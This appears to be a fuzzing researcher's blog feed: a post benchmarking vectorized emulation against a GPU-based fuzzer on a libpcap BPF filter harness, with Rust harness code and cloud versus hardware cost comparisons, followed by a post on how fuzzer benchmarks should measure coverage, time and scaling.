<p>We’re just going to compile the filter they mention in their blog, and then call <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using <code class="language-plaintext highlighter-rouge">libpcap-1.9.1</code> as distributed as a source code zip, this may differ slightly from their version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
Finished release [optimized] target(s) in 0.01s
Running `target/release/harness`
18703628.46 packets/second
</code></pre></div></div>
<p>Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.</p>
<p>This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.</p>
<h1 id="trying-to-make-the-comparison-closer">Trying to make the comparison closer</h1>
<p>I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. <strong>It’s important to note, from this point on, this comparison is for <em>myself</em>. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance.</strong> I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.</p>
<p>So, to start off, I’m going to compare the GPU fuzzer against my <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">vectorized emulation</a>. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.</p>
<p>Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.</p>
<p>Let’s try it!</p>
<h1 id="the-environment">The environment</h1>
<p>To try to get as close to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there’s no specifics about what they used as an input, so we’re making the assumption that a 1500-byte zeroed out input and simply invoking <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code>, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Due to how many <code class="language-plaintext highlighter-rouge">or</code> conditions are used in the filter, and given the packet doesn’t match any, should mean we’re seeing the <em>worst</em> case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was <code class="language-plaintext highlighter-rouge">1.2.3.4</code>, I’d suspect the performance would be improved. Without this being clarified from the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).</p>
<p>Anyways, the target code that I’m using is as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="n">Instant</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">pcap_sys</span><span class="p">::</span><span class="o">*</span><span class="p">;</span>
<span class="nd">#[link(name</span> <span class="nd">=</span> <span class="s">"pcap"</span><span class="nd">)]</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">pc</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="n">bpf_insn</span><span class="p">,</span>
<span class="n">p</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="n">wirelen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buflen</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">aux_data</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="nd">#[no_mangle]</span>
<span class="k">pub</span> <span class="k">extern</span> <span class="k">fn</span> <span class="nf">fuzz_external</span><span class="p">()</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">ITERS</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program</span><span class="p">:</span> <span class="n">bpf_program</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">();</span>
<span class="c">// Ethernet linktype + 1500 snapshot length</span>
<span class="k">let</span> <span class="n">pcap</span> <span class="o">=</span> <span class="nf">pcap_open_dead</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1500</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">!</span><span class="n">pcap</span><span class="nf">.is_null</span><span class="p">());</span>
<span class="c">// Compile the program</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">pcap_compile</span><span class="p">(</span><span class="n">pcap</span><span class="p">,</span> <span class="o">&</span><span class="k">mut</span> <span class="n">program</span><span class="p">,</span>
<span class="s">"dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or </span><span class="err">\</span><span class="s">
atalk or aarp or decnet or iso or stp or ipx</span><span class="se">\0</span><span class="s">"</span>
<span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="mi">_</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span> <span class="n">PCAP_NETMASK_UNKNOWN</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Failed to compile pcap thingy"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">buf</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">1500</span><span class="p">];</span>
<span class="c">// Filter a packet</span>
<span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">program</span><span class="py">.bf_insns</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.as_ptr</span><span class="p">(),</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null</span><span class="p">()</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">fuzz_external</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code>, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.</p>
<p>Further, I will add another breakpoint on the return site of <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing <code class="language-plaintext highlighter-rouge">buf</code>), and otherwise bubbling up to an <code class="language-plaintext highlighter-rouge">exit()</code> syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> is executing, and once it is not, the VM is reset and run again.</p>
<p>My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).</p>
<p>Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core <code class="language-plaintext highlighter-rouge">c2-standard-60</code> (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Project to try to apples-to-apples as best I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.</p>
<p>Here… we… go!</p>
<p><img src="/assets/libpcap_perf.png" alt="image" /></p>
<p>Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.</p>
<p>We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with ideally what we want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!</p>
<p>Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, and nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.</p>
<p>Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.</p>
<p>Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.</p>
<p>Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core <code class="language-plaintext highlighter-rouge">c2-standard-60</code> machine.</p>
<p>Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about <strong>79.8 million iters/second/dollar/hour</strong>.</p>
<p>I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.</p>
<p>This gives vectorized emulation about a <em>3x advantage for performance per dollar</em> compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.</p>
<h1 id="where-does-this-leave-us">Where does this leave us?</h1>
<p>I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.</p>
<p>GPUs have some major memory limitations, that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all modified memory by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero <a href="https://savannah.nongnu.org/bugs/?59308">CVE-2020-15999</a>, and I’m pusing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target, I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.</p>
<p>Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reduce the number of threads. There’s definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).</p>
<h1 id="is-there-more-perf">Is there more perf?</h1>
<p>It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?</p>
<p>Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.</p>
<p>Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.</p>
<p>This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target, compared to libfuzzer performing orchistration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.</p>
<h2 id="but-wait-what-even-are-these-dollar-amounts">But wait… what even are these dollar amounts?</h2>
<p>So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.</p>
<p>But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.</p>
<p>The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Project. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?</p>
<p>Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.</p>
<p>But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.</p>
<p>For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.</p>
<p>For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Lets just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Lets just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs ram and call it “even”.</p>
<p>Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.</p>
<p>Well, how does it stack up?</p>
<p>I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking), this is a common mode for when I’m not fuzzing too deep on a target. Well, lets light up those cores.</p>
<p><img src="/assets/lolcores.png" alt="lolcores" /></p>
<p>Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.</p>
<p>Well, we’re getting about <strong>700 million fuzz cases per second on the whole system</strong>. Woo! That’s a shitton! That is <em>77k iters/second/$</em>. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.</p>
<p>So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.</p>
<p>What gives? Well, the CPUs will definitely use more power, at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, when including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would be about 200W to run the CPU, chassis, RAM, etc, so lets say 500W. Well, it’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major, for me, I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the <em>GPUs are still about 10x more expensive to run than the CPU solution</em>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.</p>
<p>There’s a pretty large discrepency in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blogs tests (quad-core Skylake @ $200 or so vs a NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!</p>
<p>Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.</p>
<p>But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!</p>
<p>Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.</p>
<p>I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!</p>
<hr />
<h2 id="random-opinions">Random opinions</h2>
<p>I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.</p>
<h1 id="is-not-having-syscalls-a-problem">Is not having syscalls a problem?</h1>
<p>No. It’s not. It is for people who want to <em>use</em> the tool. But this is a research tool and is for exploring what is possible, the act of fuzzing on a GPU by running binary translated code is incredible, that’s the focus here! GPUs are turing complete, we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.</p>
<p>There’s also nothing preventing GPUs from being used to emulate an whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with making software TLBs these things can be manageable to a level it’s still worth doing!</p>
<hr />
<h2 id="social">Social</h2>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>The blogSome thoughts on fuzzing2020-08-11T07:11:15+00:002020-08-11T07:11:15+00:00https://gamozolabs.github.io/2020/08/11/some_fuzzing_thoughts<h1 id="foreward">Foreward</h1>
<p>This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!</p>
<p>You can find the discussion at <a href="https://github.com/google/fuzzbench/issues/654">fuzzbench issue tracker #654</a></p>
<h1 id="social">Social</h1>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<h1 id="the-blog">The blog</h1>
<p>Hello again Today!</p>
<p>So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.</p>
<h1 id="visualizations-and-what-im-often-looking-for-in-data">Visualizations, and what I’m often looking for in data</h1>
<p>When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but they should both be toggleable in the default. I’m not web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.</p>
<p>Here’s an example of typically what I graph when I’m running and tuning a fuzzer. I’m using doing side-by-side comparisons of small fuzzer tweaks, to my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.</p>
<p><img src="/assets/how_i_viz_fuzzers.png" alt="image" /></p>
<p>By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more which is happening. This graph is comparing a fuzzer which does <code class="language-plaintext highlighter-rouge">rand() % 20</code> rounds of mutation (medium corruption), versus <code class="language-plaintext highlighter-rouge">rand % 5</code> rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note, that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.</p>
<p>There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.</p>
<p>Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!</p>
<h4 id="example-analysis-conclusion">Example analysis conclusion</h4>
<p>I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.</p>
<p>Even though this program is very simple, these graphs could pretty arbitrary be stretched out to different time axis. If <a href="https://github.com/google/fuzzbench">fuzzbench</a> picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.</p>
<h1 id="the-case-for-cases">The case for cases</h1>
<p>I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is this ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.</p>
<p>When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.</p>
<p>Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.</p>
<p>Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.</p>
<h1 id="scaling">Scaling</h1>
<p>Scaling of performance is really missing from <a href="https://github.com/google/fuzzbench">fuzzbench</a>. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that <a href="https://github.com/google/fuzzbench">fuzzbench</a> is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core, coverage/case is often controlled for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.</p>
<p>However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of <a href="https://github.com/google/fuzzbench">fuzzbench</a>, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.</p>
<p>If AFL is 20% faster single-core, but bottlenecks on <code class="language-plaintext highlighter-rouge">fork()</code>, or <code class="language-plaintext highlighter-rouge">write()</code>, and thus only scales to 20-30 cores (often where I see AFL really fall apart, on medium size targets, 5-10 cores for small targets). But something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw it, libfuzzer is going to blow away any 20% performance gains seen single-core.</p>
<p>This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks. A. the possibility the fuzzer can scale in the first place, if it can’t that’s a big hit to real-world usability. B. the possibility it can scale across servers (often, over the network). Things like AFL-over-SMB would have brutal scaling properties here. C. the scalability properties between cores on the same server, and how they transfer over the network.</p>
<p>I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (<code class="language-plaintext highlighter-rouge">signal()</code>, <code class="language-plaintext highlighter-rouge">read()</code>, <code class="language-plaintext highlighter-rouge">write()</code>, per case IIRC, ~3-4 syscalls).</p>
<p>Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.</p>
<h1 id="measuring-symbolic">Measuring symbolic</h1>
<p>Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmicly should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely, that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.</p>
